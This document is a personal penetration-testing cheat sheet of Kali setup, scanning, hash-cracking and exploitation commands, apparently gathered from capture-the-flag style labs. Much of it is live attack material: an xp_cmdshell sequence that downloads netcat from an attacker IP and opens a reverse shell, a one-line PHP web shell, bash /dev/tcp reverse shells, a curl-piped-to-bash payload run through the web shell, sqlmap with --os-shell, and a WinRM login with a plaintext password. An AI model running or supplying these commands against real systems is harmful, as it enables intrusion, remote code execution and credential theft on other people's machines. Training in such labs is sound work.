Pentesting tools and useful commands
GTFOBins — list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
Default:
echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" | sudo tee /etc/apt/sources.list
More stable:
echo "deb http://http.kali.org/kali kali-last-snapshot main contrib non-free" | sudo tee /etc/apt/sources.list
Install all tools:
sudo apt install -y kali-linux-large
Install GUI:
sudo apt install -y kali-win-kex
GUI Documentation. Run GUI, to exit from full screen mode press F8:
kex --win -s
Wappalyzer — browser extension to see the technologies used on websites.
OpenVPN
sudo openvpn --config vpn.ovpn --daemon
The network interface can be checked by running the ifconfig command in the terminal.
Shutdown
sudo ifconfig tun1 down
Search WebCatalogs on site:
dirsearch -u http://october.metaltech.stf/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt
Responder
sudo responder -I tun0
John the ripper
zip2john backup.zip > hashes
john -w=/usr/share/wordlists/rockyou.txt hash.txt
Identify possible hashes
hashid 2cb42f8734ea607eefed3b70af13bbd3
Crack hash
hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt
Impacket mssql client
impacket-mssqlclient ARCHETYPE/[email protected] -windows-auth
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.17.81/nc64.exe -outfile nc64.exe"
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.17.81 443"
SQL map
sqlmap -u 'http://10.129.10.184/dashboard.php?search=asd' --cookie='PHPSESSID=tg7rj9h95j4bb1u3211ti406qo'
sqlmap -u 'http://10.129.10.184/dashboard.php?search=asd' --cookie='PHPSESSID=tg7rj9h95j4bb1u3211ti406qo' --os-shell
Evil Win Remote
evil-winrm -i 10.129.233.177 -u administrator -p badminton
sudo nmap -sV 192.168.1.1
sudo nmap -sV -sC 192.168.1.1
sudo nmap -p- --min-rate 5000 -sV 192.168.1.1
Gobuster
go install github.com/OJ/gobuster/v3@latest
git clone https://github.com/danielmiessler/SecLists.git
gobuster dir --url http://10.129.236.130/ --wordlist ./SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
gobuster dir --url http://10.129.119.70/ --wordlist ./SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -x php,html
gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb
MySQL
mysql -h 10.129.132.32 -u root
SHOW databases; : Prints out the databases we can access.
USE {database_name}; : Set to use the database named {database_name}.
SHOW tables; : Prints out the available tables inside the current
database.
SELECT * FROM {table_name}; : Prints out all the data from the table {table_name}.
SMB
smbclient -N -L \\\\{TARGET_IP}\\
-N : No password
-L : This option allows you to look at what services are available on a server
Simple PHP Shell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
Reverse Shell
printf '#!/bin/bash\nbash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1' > shell.sh
Or
bash -c "bash -i >& /dev/tcp/{your_IP}/1337 0>&1"
Start ncat listener
nc -nvlp 1337
Start Web Server
python3 -m http.server 8000
Start example
http://thetoppers.htb/shell.php?cmd=curl%20%3CYOUR_IP_ADDRESS%3E:8000/shell.sh|bash
Functional shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
Upgrade shell
script /dev/null -c bash